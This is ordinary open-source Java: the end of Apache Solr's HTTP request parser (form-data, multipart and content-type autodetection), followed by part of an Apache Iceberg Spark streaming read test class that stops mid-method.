size = part.getSize(); } @Override public InputStream getStream() throws IOException { return part.getInputStream(); } } } public static boolean isMultipart(HttpServletRequest req) { String ct = req.getContentType(); return ct != null && ct.startsWith("multipart/form-data"); } /** Clean up any files created by MultiPartInputStream. */ static void cleanupMultipartFiles(HttpServletRequest request) { if (!SolrRequestParsers.isMultipart(request)) { return; } log.debug("Deleting multipart files"); Collection<Part> parts; try { parts = request.getParts(); } catch (Exception e) { assert false : e.toString(); log.error("Couldn't get multipart parts in order to delete them", e); return; } for (Part part : parts) { try { part.delete(); } catch (IOException e) { log.warn("Errors deleting multipart tmp files", e); } } } /** Extract application/x-www-form-urlencoded form data for POST requests */ static class FormDataRequestParser implements SolrRequestParser { private static final long WS_MASK = (1L << ' ') | (1L << '\t') | (1L << '\r') | (1L << '\n') | (1L << '#') | (1L << '/') | (0x01); // set 1 bit so 0xA0 will be flagged as possible whitespace private final int uploadLimitKB; public FormDataRequestParser(int limit) { uploadLimitKB = limit; } public SolrParams parseParamsAndFillStreams( HttpServletRequest req, ArrayList<ContentStream> streams, InputStream in) throws Exception { final Map<String, String[]> map = new HashMap<>(); // also add possible URL parameters and include into the map (parsed using UTF-8): final String qs = req.getQueryString(); if (qs != null) { parseQueryString(qs, map); } // may be -1, so we check again later. But if it's already greater we can stop processing! final long totalLength = req.getContentLength(); final long maxLength = ((long) uploadLimitKB) * 1024L; if (totalLength > maxLength) { throw new SolrException( ErrorCode.BAD_REQUEST, "application/x-www-form-urlencoded content length (" + totalLength + " bytes) exceeds upload limit of " + uploadLimitKB + " KB"); } // get query String from request body, using the charset given in content-type: final String cs = ContentStreamBase.getCharsetFromContentType(req.getContentType()); final Charset charset = (cs == null) ? StandardCharsets.UTF_8 : Charset.forName(cs); try { // Protect container owned streams from being closed by us, see SOLR-8933 in = FastInputStream.wrap( in == null ? new CloseShieldInputStream(req.getInputStream()) : new CloseShieldInputStream(in)); final long bytesRead = parseFormDataContent(in, maxLength, charset, map, false); if (bytesRead == 0L && totalLength > 0L) { throw getParameterIncompatibilityException(); } } catch (IOException ioe) { throw new SolrException(ErrorCode.BAD_REQUEST, ioe); } catch (IllegalStateException ise) { throw (SolrException) getParameterIncompatibilityException().initCause(ise); } finally { IOUtils.closeWhileHandlingException(in); } return new MultiMapSolrParams(map); } @Override public SolrParams parseParamsAndFillStreams( HttpServletRequest req, ArrayList<ContentStream> streams) throws Exception { if (!isFormData(req)) { throw new SolrException( ErrorCode.BAD_REQUEST, "Not application/x-www-form-urlencoded content: " + req.getContentType()); } return parseParamsAndFillStreams(req, streams, null); } public static SolrException getParameterIncompatibilityException() { return new SolrException( ErrorCode.SERVER_ERROR, "Solr requires that request parameters sent using application/x-www-form-urlencoded " + "content-type can be read through the request input stream. Unfortunately, the " + "stream was empty / not available. This may be caused by another servlet filter calling " + "ServletRequest.getParameter*() before SolrDispatchFilter, please remove it."); } public boolean isFormData(HttpServletRequest req) { String contentType = req.getContentType(); if (contentType != null) { int idx = contentType.indexOf(';'); if (idx > 0) { // remove the charset definition "; charset=utf-8" contentType = contentType.substring(0, idx); } contentType = contentType.trim(); if ("application/x-www-form-urlencoded".equalsIgnoreCase(contentType)) { return true; } } return false; } } /** The default Logic */ static class StandardRequestParser implements SolrRequestParser { MultipartRequestParser multipart; RawRequestParser raw; FormDataRequestParser formdata; StandardRequestParser( MultipartRequestParser multi, RawRequestParser raw, FormDataRequestParser formdata) { this.multipart = multi; this.raw = raw; this.formdata = formdata; } @Override public SolrParams parseParamsAndFillStreams( final HttpServletRequest req, ArrayList<ContentStream> streams) throws Exception { String contentType = req.getContentType(); String method = req.getMethod(); // No need to uppercase... HTTP verbs are case sensitive String uri = req.getRequestURI(); boolean isV2 = getHttpSolrCall(req) instanceof V2HttpCall; boolean isPost = "POST".equals(method); // SOLR-6787 changed the behavior of a POST without content type. Previously it would throw // an exception, but now it will use the raw request parser. /* if (contentType == null && isPost) { throw new SolrException(ErrorCode.UNSUPPORTED_MEDIA_TYPE, "Must specify a Content-Type header with POST requests"); } */ // According to previous StandardRequestParser logic (this is a re-written version), // POST was handled normally, but other methods (PUT/DELETE) // were handled by the RestManager classes if the URI contained /schema or /config if (!isPost) { if (isV2) { return raw.parseParamsAndFillStreams(req, streams); } if (contentType == null) { return parseQueryString(req.getQueryString()); } // This happens when Jetty redirected a request that initially had no content body if (contentType.equals("application/octet-stream") && req.getContentLength() == 0) { return parseQueryString(req.getQueryString()); } // OK, we have a BODY at this point boolean schemaRestPath = false; int idx = uri.indexOf("/schema"); if ((idx >= 0 && uri.endsWith("/schema")) || uri.contains("/schema/")) { schemaRestPath = true; } if (schemaRestPath) { return raw.parseParamsAndFillStreams(req, streams); } if ("PUT".equals(method) || "DELETE".equals(method)) { throw new SolrException( ErrorCode.BAD_REQUEST, "Unsupported method: " + method + " for request " + req); } } if (formdata.isFormData(req)) { String userAgent = req.getHeader("User-Agent"); boolean isCurl = userAgent != null && userAgent.startsWith("curl/"); FastInputStream input = FastInputStream.wrap(req.getInputStream()); if (isCurl) { SolrParams params = autodetect(req, streams, input); if (params != null) return params; } return formdata.parseParamsAndFillStreams(req, streams, input); } if (isMultipart(req)) { return multipart.parseParamsAndFillStreams(req, streams); } // some other content-type (json, XML, csv, etc) return raw.parseParamsAndFillStreams(req, streams); } } private static final long WS_MASK = (1L << ' ') | (1L << '\t') | (1L << '\r') | (1L << '\n') | (1L << '#') | (1L << '/') | (0x01); // set 1 bit so 0xA0 will be flagged as possible whitespace /** Returns the parameter map if a different content type was auto-detected */ private static SolrParams autodetect( HttpServletRequest req, ArrayList<ContentStream> streams, FastInputStream in) throws IOException { String detectedContentType = null; boolean shouldClose = true; try { in.peek(); // should cause some bytes to be read byte[] arr = in.getBuffer(); int pos = in.getPositionInBuffer(); int end = in.getEndInBuffer(); // we do "end-1" because we check "arr[i+1]" sometimes in the loop body for (int i = pos; i < end - 1; i++) { int ch = arr[i]; boolean isWhitespace = ((WS_MASK >> ch) & 0x01) != 0 && (ch <= ' ' || ch == 0xa0); if (!isWhitespace) { // first non-whitespace chars if (ch == '#' // single line comment || (ch == '/' && (arr[i + 1] == '/' || arr[i + 1] == '*')) // single line or multi-line comment || (ch == '{' || ch == '[') // start of JSON object ) { detectedContentType = "application/json"; } if (ch == '<') { detectedContentType = "text/xml"; } break; } } if (detectedContentType == null) { shouldClose = false; return null; } Long size = null; String v = req.getHeader("Content-Length"); if (v != null) { size = Long.valueOf(v); } streams.add(new InputStreamContentStream(in, detectedContentType, size)); final Map<String, String[]> map = new HashMap<>(); // also add possible URL parameters and include into the map (parsed using UTF-8): final String qs = req.getQueryString(); if (qs != null) { parseQueryString(qs, map); } return new MultiMapSolrParams(map); } catch (IOException ioe) { throw new SolrException(ErrorCode.BAD_REQUEST, ioe); } catch (IllegalStateException ise) { throw (SolrException) FormDataRequestParser.getParameterIncompatibilityException().initCause(ise); } finally { if (shouldClose) { IOUtils.closeWhileHandlingException(in); } } } /** Wrap InputStream as a ContentStream */ static class InputStreamContentStream extends ContentStreamBase { private final InputStream is; public InputStreamContentStream(InputStream is, String detectedContentType, Long size) { this.is = is; this.contentType = detectedContentType; this.size = size; } @Override public InputStream getStream() throws IOException { return is; } } }
apache/iceberg
35,736
spark/v4.0/spark/src/test/java/org/apache/iceberg/spark/source/TestStructuredStreamingRead3.java
/* * Licensed to the Apache Software Foundation (ASF) under one * or more contributor license agreements. See the NOTICE file * distributed with this work for additional information * regarding copyright ownership. The ASF licenses this file * to you under the Apache License, Version 2.0 (the * "License"); you may not use this file except in compliance * with the License. You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, * software distributed under the License is distributed on an * "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY * KIND, either express or implied. See the License for the * specific language governing permissions and limitations * under the License. */ package org.apache.iceberg.spark.source; import static org.apache.iceberg.expressions.Expressions.ref; import static org.assertj.core.api.Assertions.assertThat; import static org.assertj.core.api.Assertions.assertThatThrownBy; import java.io.File; import java.io.IOException; import java.util.Collections; import java.util.List; import java.util.Map; import java.util.concurrent.TimeoutException; import java.util.concurrent.atomic.AtomicInteger; import java.util.stream.IntStream; import org.apache.iceberg.BaseTable; import org.apache.iceberg.DataFile; import org.apache.iceberg.DataFiles; import org.apache.iceberg.DataOperations; import org.apache.iceberg.DeleteFile; import org.apache.iceberg.FileFormat; import org.apache.iceberg.Files; import org.apache.iceberg.ParameterizedTestExtension; import org.apache.iceberg.RewriteFiles; import org.apache.iceberg.Schema; import org.apache.iceberg.Snapshot; import org.apache.iceberg.Table; import org.apache.iceberg.TableMetadata; import org.apache.iceberg.TableOperations; import org.apache.iceberg.TestHelpers; import org.apache.iceberg.data.FileHelpers; import org.apache.iceberg.data.GenericRecord; import org.apache.iceberg.data.Record; import org.apache.iceberg.expressions.Expressions; import org.apache.iceberg.relocated.com.google.common.collect.ImmutableMap; import org.apache.iceberg.relocated.com.google.common.collect.Iterables; import org.apache.iceberg.relocated.com.google.common.collect.Lists; import org.apache.iceberg.spark.CatalogTestBase; import org.apache.iceberg.spark.SparkReadOptions; import org.apache.spark.api.java.function.VoidFunction2; import org.apache.spark.sql.Dataset; import org.apache.spark.sql.Encoders; import org.apache.spark.sql.Row; import org.apache.spark.sql.internal.SQLConf; import org.apache.spark.sql.streaming.DataStreamWriter; import org.apache.spark.sql.streaming.OutputMode; import org.apache.spark.sql.streaming.StreamingQuery; import org.apache.spark.sql.streaming.Trigger; import org.junit.jupiter.api.AfterEach; import org.junit.jupiter.api.BeforeAll; import org.junit.jupiter.api.BeforeEach; import org.junit.jupiter.api.TestTemplate; import org.junit.jupiter.api.extension.ExtendWith; @ExtendWith(ParameterizedTestExtension.class) public final class TestStructuredStreamingRead3 extends CatalogTestBase { private Table table; private final AtomicInteger microBatches = new AtomicInteger(); /** * test data to be used by multiple writes each write creates a snapshot and writes a list of * records */ private static final List<List<SimpleRecord>> TEST_DATA_MULTIPLE_SNAPSHOTS = Lists.newArrayList( Lists.newArrayList( new SimpleRecord(1, "one"), new SimpleRecord(2, "two"), new SimpleRecord(3, "three")), Lists.newArrayList(new SimpleRecord(4, "four"), new SimpleRecord(5, "five")), Lists.newArrayList(new SimpleRecord(6, "six"), new SimpleRecord(7, "seven"))); /** * test data - to be used for multiple write batches each batch inturn will have multiple * snapshots */ private static final List<List<List<SimpleRecord>>> TEST_DATA_MULTIPLE_WRITES_MULTIPLE_SNAPSHOTS = Lists.newArrayList( Lists.newArrayList( Lists.newArrayList( new SimpleRecord(1, "one"), new SimpleRecord(2, "two"), new SimpleRecord(3, "three")), Lists.newArrayList(new SimpleRecord(4, "four"), new SimpleRecord(5, "five"))), Lists.newArrayList( Lists.newArrayList(new SimpleRecord(6, "six"), new SimpleRecord(7, "seven")), Lists.newArrayList(new SimpleRecord(8, "eight"), new SimpleRecord(9, "nine"))), Lists.newArrayList( Lists.newArrayList( new SimpleRecord(10, "ten"), new SimpleRecord(11, "eleven"), new SimpleRecord(12, "twelve")), Lists.newArrayList( new SimpleRecord(13, "thirteen"), new SimpleRecord(14, "fourteen")), Lists.newArrayList( new SimpleRecord(15, "fifteen"), new SimpleRecord(16, "sixteen")))); @BeforeAll public static void setupSpark() { // disable AQE as tests assume that writes generate a particular number of files spark.conf().set(SQLConf.ADAPTIVE_EXECUTION_ENABLED().key(), "false"); } @BeforeEach public void setupTable() { sql( "CREATE TABLE %s " + "(id INT, data STRING) " + "USING iceberg " + "PARTITIONED BY (bucket(3, id)) " + "TBLPROPERTIES ('commit.manifest.min-count-to-merge'='3', 'commit.manifest-merge.enabled'='true')", tableName); this.table = validationCatalog.loadTable(tableIdent); microBatches.set(0); } @AfterEach public void stopStreams() throws TimeoutException { for (StreamingQuery query : spark.streams().active()) { query.stop(); } } @AfterEach public void removeTables() { sql("DROP TABLE IF EXISTS %s", tableName); } @TestTemplate public void testReadStreamOnIcebergTableWithMultipleSnapshots() throws Exception { List<List<SimpleRecord>> expected = TEST_DATA_MULTIPLE_SNAPSHOTS; appendDataAsMultipleSnapshots(expected); StreamingQuery query = startStream(); List<SimpleRecord> actual = rowsAvailable(query); assertThat(actual).containsExactlyInAnyOrderElementsOf(Iterables.concat(expected)); } @TestTemplate public void testReadStreamWithMaxFiles1() throws Exception { appendDataAsMultipleSnapshots(TEST_DATA_MULTIPLE_SNAPSHOTS); assertMicroBatchRecordSizes( ImmutableMap.of(SparkReadOptions.STREAMING_MAX_FILES_PER_MICRO_BATCH, "1"), List.of(1L, 2L, 1L, 1L, 1L, 1L)); assertMicroBatchRecordSizes( ImmutableMap.of(SparkReadOptions.STREAMING_MAX_FILES_PER_MICRO_BATCH, "1"), List.of(1L, 2L, 1L, 1L, 1L, 1L), Trigger.AvailableNow()); } @TestTemplate public void testReadStreamWithMaxFiles2() throws Exception { appendDataAsMultipleSnapshots(TEST_DATA_MULTIPLE_SNAPSHOTS); assertMicroBatchRecordSizes( ImmutableMap.of(SparkReadOptions.STREAMING_MAX_FILES_PER_MICRO_BATCH, "2"), List.of(3L, 2L, 2L)); assertMicroBatchRecordSizes( ImmutableMap.of(SparkReadOptions.STREAMING_MAX_FILES_PER_MICRO_BATCH, "2"), List.of(3L, 2L, 2L), Trigger.AvailableNow()); } @TestTemplate public void testReadStreamWithMaxRows1() throws Exception { appendDataAsMultipleSnapshots(TEST_DATA_MULTIPLE_SNAPSHOTS); assertMicroBatchRecordSizes( ImmutableMap.of(SparkReadOptions.STREAMING_MAX_ROWS_PER_MICRO_BATCH, "1"), List.of(1L, 2L, 1L, 1L, 1L, 1L)); assertMicroBatchRecordSizes( ImmutableMap.of(SparkReadOptions.STREAMING_MAX_ROWS_PER_MICRO_BATCH, "1"), List.of(1L, 2L, 1L, 1L, 1L, 1L), Trigger.AvailableNow()); // soft limit of 1 is being enforced, the stream is not blocked. StreamingQuery query = startStream(ImmutableMap.of(SparkReadOptions.STREAMING_MAX_ROWS_PER_MICRO_BATCH, "1")); // check answer correctness only 1 record read the micro-batch will be stuck List<SimpleRecord> actual = rowsAvailable(query); assertThat(actual) .containsExactlyInAnyOrderElementsOf(Iterables.concat(TEST_DATA_MULTIPLE_SNAPSHOTS)); } @TestTemplate public void testReadStreamWithMaxRows2() throws Exception { appendDataAsMultipleSnapshots(TEST_DATA_MULTIPLE_SNAPSHOTS); assertMicroBatchRecordSizes( ImmutableMap.of(SparkReadOptions.STREAMING_MAX_ROWS_PER_MICRO_BATCH, "2"), List.of(3L, 2L, 2L)); assertMicroBatchRecordSizes( ImmutableMap.of(SparkReadOptions.STREAMING_MAX_ROWS_PER_MICRO_BATCH, "2"), List.of(3L, 2L, 2L), Trigger.AvailableNow()); StreamingQuery query = startStream(ImmutableMap.of(SparkReadOptions.STREAMING_MAX_ROWS_PER_MICRO_BATCH, "2")); List<SimpleRecord> actual = rowsAvailable(query); assertThat(actual) .containsExactlyInAnyOrderElementsOf(Iterables.concat(TEST_DATA_MULTIPLE_SNAPSHOTS)); } @TestTemplate public void testReadStreamWithMaxRows4() throws Exception { appendDataAsMultipleSnapshots(TEST_DATA_MULTIPLE_SNAPSHOTS); assertMicroBatchRecordSizes( ImmutableMap.of(SparkReadOptions.STREAMING_MAX_ROWS_PER_MICRO_BATCH, "4"), List.of(4L, 3L)); assertMicroBatchRecordSizes( ImmutableMap.of(SparkReadOptions.STREAMING_MAX_ROWS_PER_MICRO_BATCH, "4"), List.of(4L, 3L), Trigger.AvailableNow()); } @TestTemplate public void testReadStreamWithCompositeReadLimit() throws Exception { appendDataAsMultipleSnapshots(TEST_DATA_MULTIPLE_SNAPSHOTS); assertMicroBatchRecordSizes( ImmutableMap.of( SparkReadOptions.STREAMING_MAX_FILES_PER_MICRO_BATCH, "1", SparkReadOptions.STREAMING_MAX_ROWS_PER_MICRO_BATCH, "2"), List.of(1L, 2L, 1L, 1L, 1L, 1L)); assertMicroBatchRecordSizes( ImmutableMap.of( SparkReadOptions.STREAMING_MAX_FILES_PER_MICRO_BATCH, "1", SparkReadOptions.STREAMING_MAX_ROWS_PER_MICRO_BATCH, "2"), List.of(1L, 2L, 1L, 1L, 1L, 1L), Trigger.AvailableNow()); } @TestTemplate public void testAvailableNowStreamReadShouldNotHangOrReprocessData() throws Exception { File writerCheckpointFolder = temp.resolve("writer-checkpoint-folder").toFile(); File writerCheckpoint = new File(writerCheckpointFolder, "writer-checkpoint"); File output = temp.resolve("junit").toFile(); DataStreamWriter querySource = spark .readStream() .format("iceberg") .load(tableName) .writeStream() .option("checkpointLocation", writerCheckpoint.toString()) .format("parquet") .trigger(Trigger.AvailableNow()) .option("path", output.getPath()); List<SimpleRecord> expected = Lists.newArrayList(); for (List<List<SimpleRecord>> expectedCheckpoint : TEST_DATA_MULTIPLE_WRITES_MULTIPLE_SNAPSHOTS) { // New data was added while the stream was not running appendDataAsMultipleSnapshots(expectedCheckpoint); expected.addAll(Lists.newArrayList(Iterables.concat(Iterables.concat(expectedCheckpoint)))); try { StreamingQuery query = querySource.start(); // Query should terminate on its own after processing all available data assertThat(query.awaitTermination(60000)).isTrue(); // Check output List<SimpleRecord> actual = spark .read() .load(output.getPath()) .as(Encoders.bean(SimpleRecord.class)) .collectAsList(); assertThat(actual).containsExactlyInAnyOrderElementsOf(Iterables.concat(expected)); // Restarting immediately should not reprocess data query = querySource.start(); assertThat(query.awaitTermination(60000)).isTrue(); assertThat(query.recentProgress().length).isEqualTo(1); assertThat(query.recentProgress()[0].sources()[0].startOffset()) .isEqualTo(query.recentProgress()[0].sources()[0].endOffset()); } finally { stopStreams(); } } } @TestTemplate public void testTriggerAvailableNowDoesNotProcessNewDataWhileRunning() throws Exception { List<List<SimpleRecord>> expectedData = TEST_DATA_MULTIPLE_SNAPSHOTS; appendDataAsMultipleSnapshots(expectedData); long expectedRecordCount = expectedData.stream().mapToLong(List::size).sum(); table.refresh(); long expectedSnapshotId = table.currentSnapshot().snapshotId(); String sinkTable = "availablenow_sink"; StreamingQuery query = spark .readStream() .option(SparkReadOptions.STREAMING_MAX_FILES_PER_MICRO_BATCH, "1") .format("iceberg") .load(tableName) .writeStream() .format("memory") .queryName(sinkTable) .trigger(Trigger.AvailableNow()) .start(); assertThat(query.isActive()).isTrue(); // Add new data while the stream is running List<SimpleRecord> newDataDuringStreamSnap1 = Lists.newArrayList( new SimpleRecord(100, "hundred"), new SimpleRecord(101, "hundred-one"), new SimpleRecord(102, "hundred-two")); List<SimpleRecord> newDataDuringStreamSnap2 = Lists.newArrayList( new SimpleRecord(200, "two-hundred"), new SimpleRecord(201, "two-hundred-one")); appendData(newDataDuringStreamSnap1); appendData(newDataDuringStreamSnap2); // Query should terminate on its own after processing all available data till expectedSnapshotId assertThat(query.awaitTermination(60000)).isTrue(); List<SimpleRecord> actualResults = spark .sql("SELECT * FROM " + sinkTable) .as(Encoders.bean(SimpleRecord.class)) .collectAsList(); long endOffsetSnapshotId = StreamingOffset.fromJson(query.lastProgress().sources()[0].endOffset()).snapshotId(); // Verify the stream processed only up to the snapshot present when started assertThat(expectedSnapshotId).isEqualTo(endOffsetSnapshotId); // Verify only the initial data was processed assertThat(actualResults.size()).isEqualTo(expectedRecordCount); assertThat(actualResults).containsExactlyInAnyOrderElementsOf(Iterables.concat(expectedData)); } @TestTemplate public void testReadStreamOnIcebergThenAddData() throws Exception { List<List<SimpleRecord>> expected = TEST_DATA_MULTIPLE_SNAPSHOTS; StreamingQuery query = startStream(); appendDataAsMultipleSnapshots(expected); List<SimpleRecord> actual = rowsAvailable(query); assertThat(actual).containsExactlyInAnyOrderElementsOf(Iterables.concat(expected)); } @TestTemplate public void testReadingStreamFromTimestamp() throws Exception { List<SimpleRecord> dataBeforeTimestamp = Lists.newArrayList( new SimpleRecord(-2, "minustwo"), new SimpleRecord(-1, "minusone"), new SimpleRecord(0, "zero")); appendData(dataBeforeTimestamp); table.refresh(); long streamStartTimestamp = table.currentSnapshot().timestampMillis() + 1; StreamingQuery query = startStream(SparkReadOptions.STREAM_FROM_TIMESTAMP, Long.toString(streamStartTimestamp)); List<SimpleRecord> empty = rowsAvailable(query); assertThat(empty).isEmpty(); List<List<SimpleRecord>> expected = TEST_DATA_MULTIPLE_SNAPSHOTS; appendDataAsMultipleSnapshots(expected); List<SimpleRecord> actual = rowsAvailable(query); assertThat(actual).containsExactlyInAnyOrderElementsOf(Iterables.concat(expected)); } @TestTemplate public void testReadingStreamFromFutureTimetsamp() throws Exception { long futureTimestamp = System.currentTimeMillis() + 10000; StreamingQuery query = startStream(SparkReadOptions.STREAM_FROM_TIMESTAMP, Long.toString(futureTimestamp)); List<SimpleRecord> actual = rowsAvailable(query); assertThat(actual).isEmpty(); List<SimpleRecord> data = Lists.newArrayList( new SimpleRecord(-2, "minustwo"), new SimpleRecord(-1, "minusone"), new SimpleRecord(0, "zero")); // Perform several inserts that should not show up because the fromTimestamp has not elapsed IntStream.range(0, 3) .forEach( x -> { appendData(data); assertThat(rowsAvailable(query)).isEmpty(); }); waitUntilAfter(futureTimestamp); // Data appended after the timestamp should appear appendData(data); actual = rowsAvailable(query); assertThat(actual).containsExactlyInAnyOrderElementsOf(data); } @TestTemplate public void testReadingStreamFromTimestampFutureWithExistingSnapshots() throws Exception { List<SimpleRecord> dataBeforeTimestamp = Lists.newArrayList( new SimpleRecord(1, "one"), new SimpleRecord(2, "two"), new SimpleRecord(3, "three")); appendData(dataBeforeTimestamp); long streamStartTimestamp = System.currentTimeMillis() + 2000; // Start the stream with a future timestamp after the current snapshot StreamingQuery query = startStream(SparkReadOptions.STREAM_FROM_TIMESTAMP, Long.toString(streamStartTimestamp)); List<SimpleRecord> actual = rowsAvailable(query); assertThat(actual).isEmpty(); // Stream should contain data added after the timestamp elapses waitUntilAfter(streamStartTimestamp); List<List<SimpleRecord>> expected = TEST_DATA_MULTIPLE_SNAPSHOTS; appendDataAsMultipleSnapshots(expected); assertThat(rowsAvailable(query)) .containsExactlyInAnyOrderElementsOf(Iterables.concat(expected)); } @TestTemplate public void testReadingStreamFromTimestampOfExistingSnapshot() throws Exception { List<List<SimpleRecord>> expected = TEST_DATA_MULTIPLE_SNAPSHOTS; // Create an existing snapshot with some data appendData(expected.get(0)); table.refresh(); long firstSnapshotTime = table.currentSnapshot().timestampMillis(); // Start stream giving the first Snapshot's time as the start point StreamingQuery stream = startStream(SparkReadOptions.STREAM_FROM_TIMESTAMP, Long.toString(firstSnapshotTime)); // Append rest of expected data for (int i = 1; i < expected.size(); i++) { appendData(expected.get(i)); } List<SimpleRecord> actual = rowsAvailable(stream); assertThat(actual).containsExactlyInAnyOrderElementsOf(Iterables.concat(expected)); } @TestTemplate public void testReadingStreamWithExpiredSnapshotFromTimestamp() throws TimeoutException { List<SimpleRecord> firstSnapshotRecordList = Lists.newArrayList(new SimpleRecord(1, "one")); List<SimpleRecord> secondSnapshotRecordList = Lists.newArrayList(new SimpleRecord(2, "two")); List<SimpleRecord> thirdSnapshotRecordList = Lists.newArrayList(new SimpleRecord(3, "three")); List<SimpleRecord> expectedRecordList = Lists.newArrayList(); expectedRecordList.addAll(secondSnapshotRecordList); expectedRecordList.addAll(thirdSnapshotRecordList); appendData(firstSnapshotRecordList); table.refresh(); long firstSnapshotid = table.currentSnapshot().snapshotId(); long firstSnapshotCommitTime = table.currentSnapshot().timestampMillis(); appendData(secondSnapshotRecordList); appendData(thirdSnapshotRecordList); table.expireSnapshots().expireSnapshotId(firstSnapshotid).commit(); StreamingQuery query = startStream( SparkReadOptions.STREAM_FROM_TIMESTAMP, String.valueOf(firstSnapshotCommitTime)); List<SimpleRecord> actual = rowsAvailable(query); assertThat(actual).containsExactlyInAnyOrderElementsOf(expectedRecordList); } @TestTemplate public void testResumingStreamReadFromCheckpoint() throws Exception { File writerCheckpointFolder = temp.resolve("writer-checkpoint-folder").toFile(); File writerCheckpoint = new File(writerCheckpointFolder, "writer-checkpoint"); File output = temp.resolve("junit").toFile(); DataStreamWriter querySource = spark .readStream() .format("iceberg") .load(tableName) .writeStream() .option("checkpointLocation", writerCheckpoint.toString()) .format("parquet") .queryName("checkpoint_test") .option("path", output.getPath()); StreamingQuery startQuery = querySource.start(); startQuery.processAllAvailable(); startQuery.stop(); List<SimpleRecord> expected = Lists.newArrayList(); for (List<List<SimpleRecord>> expectedCheckpoint : TEST_DATA_MULTIPLE_WRITES_MULTIPLE_SNAPSHOTS) { // New data was added while the stream was down appendDataAsMultipleSnapshots(expectedCheckpoint); expected.addAll(Lists.newArrayList(Iterables.concat(Iterables.concat(expectedCheckpoint)))); // Stream starts up again from checkpoint read the newly added data and shut down StreamingQuery restartedQuery = querySource.start(); restartedQuery.processAllAvailable(); restartedQuery.stop(); // Read data added by the stream List<SimpleRecord> actual = spark.read().load(output.getPath()).as(Encoders.bean(SimpleRecord.class)).collectAsList(); assertThat(actual).containsExactlyInAnyOrderElementsOf(Iterables.concat(expected)); } } @TestTemplate public void testFailReadingCheckpointInvalidSnapshot() throws IOException, TimeoutException { File writerCheckpointFolder = temp.resolve("writer-checkpoint-folder").toFile(); File writerCheckpoint = new File(writerCheckpointFolder, "writer-checkpoint"); File output = temp.resolve("junit").toFile(); DataStreamWriter querySource = spark .readStream() .format("iceberg") .load(tableName) .writeStream() .option("checkpointLocation", writerCheckpoint.toString()) .format("parquet") .queryName("checkpoint_test") .option("path", output.getPath()); List<SimpleRecord> firstSnapshotRecordList = Lists.newArrayList(new SimpleRecord(1, "one")); List<SimpleRecord> secondSnapshotRecordList = Lists.newArrayList(new SimpleRecord(2, "two")); StreamingQuery startQuery = querySource.start(); appendData(firstSnapshotRecordList); table.refresh(); long firstSnapshotid = table.currentSnapshot().snapshotId(); startQuery.processAllAvailable(); startQuery.stop(); appendData(secondSnapshotRecordList); table.expireSnapshots().expireSnapshotId(firstSnapshotid).commit(); StreamingQuery restartedQuery = querySource.start(); assertThatThrownBy(restartedQuery::processAllAvailable) .hasCauseInstanceOf(IllegalStateException.class) .hasMessageContaining( String.format( "Cannot load current offset at snapshot %d, the snapshot was expired or removed", firstSnapshotid)); } @TestTemplate public void testParquetOrcAvroDataInOneTable() throws Exception { List<SimpleRecord> parquetFileRecords = Lists.newArrayList( new SimpleRecord(1, "one"), new SimpleRecord(2, "two"), new SimpleRecord(3, "three")); List<SimpleRecord> orcFileRecords = Lists.newArrayList(new SimpleRecord(4, "four"), new SimpleRecord(5, "five")); List<SimpleRecord> avroFileRecords = Lists.newArrayList(new SimpleRecord(6, "six"), new SimpleRecord(7, "seven")); appendData(parquetFileRecords); appendData(orcFileRecords, "orc"); appendData(avroFileRecords, "avro"); StreamingQuery query = startStream(); assertThat(rowsAvailable(query)) .containsExactlyInAnyOrderElementsOf( Iterables.concat(parquetFileRecords, orcFileRecords, avroFileRecords)); } @TestTemplate public void testReadStreamFromEmptyTable() throws Exception { StreamingQuery stream = startStream(); List<SimpleRecord> actual = rowsAvailable(stream); assertThat(actual).isEmpty(); } @TestTemplate public void testReadStreamWithSnapshotTypeOverwriteErrorsOut() throws Exception { // upgrade table to version 2 - to facilitate creation of Snapshot of type OVERWRITE. TableOperations ops = ((BaseTable) table).operations(); TableMetadata meta = ops.current(); ops.commit(meta, meta.upgradeToFormatVersion(2)); // fill table with some initial data List<List<SimpleRecord>> dataAcrossSnapshots = TEST_DATA_MULTIPLE_SNAPSHOTS; appendDataAsMultipleSnapshots(dataAcrossSnapshots); Schema deleteRowSchema = table.schema().select("data"); Record dataDelete = GenericRecord.create(deleteRowSchema); List<Record> dataDeletes = Lists.newArrayList( dataDelete.copy("data", "one") // id = 1 ); DeleteFile eqDeletes = FileHelpers.writeDeleteFile( table, Files.localOutput(File.createTempFile("junit", null, temp.toFile())), TestHelpers.Row.of(0), dataDeletes, deleteRowSchema); DataFile dataFile = DataFiles.builder(table.spec()) .withPath(File.createTempFile("junit", null, temp.toFile()).getPath()) .withFileSizeInBytes(10) .withRecordCount(1) .withFormat(FileFormat.PARQUET) .build(); table.newRowDelta().addRows(dataFile).addDeletes(eqDeletes).commit(); // check pre-condition - that the above Delete file write - actually resulted in snapshot of // type OVERWRITE assertThat(table.currentSnapshot().operation()).isEqualTo(DataOperations.OVERWRITE); StreamingQuery query = startStream(); assertThatThrownBy(query::processAllAvailable) .cause() .isInstanceOf(IllegalStateException.class) .hasMessageStartingWith("Cannot process overwrite snapshot"); } @TestTemplate public void testReadStreamWithSnapshotTypeRewriteDataFilesIgnoresReplace() throws Exception { // fill table with some data List<List<SimpleRecord>> expected = TEST_DATA_MULTIPLE_SNAPSHOTS; appendDataAsMultipleSnapshots(expected); makeRewriteDataFiles(); assertMicroBatchRecordSizes( ImmutableMap.of(SparkReadOptions.STREAMING_MAX_FILES_PER_MICRO_BATCH, "1"), List.of(1L, 2L, 1L, 1L, 1L, 1L)); } @TestTemplate public void testReadStreamWithSnapshotTypeRewriteDataFilesIgnoresReplaceMaxRows() throws Exception { // fill table with some data List<List<SimpleRecord>> expected = TEST_DATA_MULTIPLE_SNAPSHOTS; appendDataAsMultipleSnapshots(expected); makeRewriteDataFiles(); assertMicroBatchRecordSizes( ImmutableMap.of(SparkReadOptions.STREAMING_MAX_ROWS_PER_MICRO_BATCH, "4"), List.of(4L, 3L)); } @TestTemplate public void testReadStreamWithSnapshotTypeRewriteDataFilesIgnoresReplaceMaxFilesAndRows() throws Exception { // fill table with some data List<List<SimpleRecord>> expected = TEST_DATA_MULTIPLE_SNAPSHOTS; appendDataAsMultipleSnapshots(expected); makeRewriteDataFiles(); assertMicroBatchRecordSizes( ImmutableMap.of( SparkReadOptions.STREAMING_MAX_ROWS_PER_MICRO_BATCH, "4", SparkReadOptions.STREAMING_MAX_FILES_PER_MICRO_BATCH, "1"), List.of(1L, 2L, 1L, 1L, 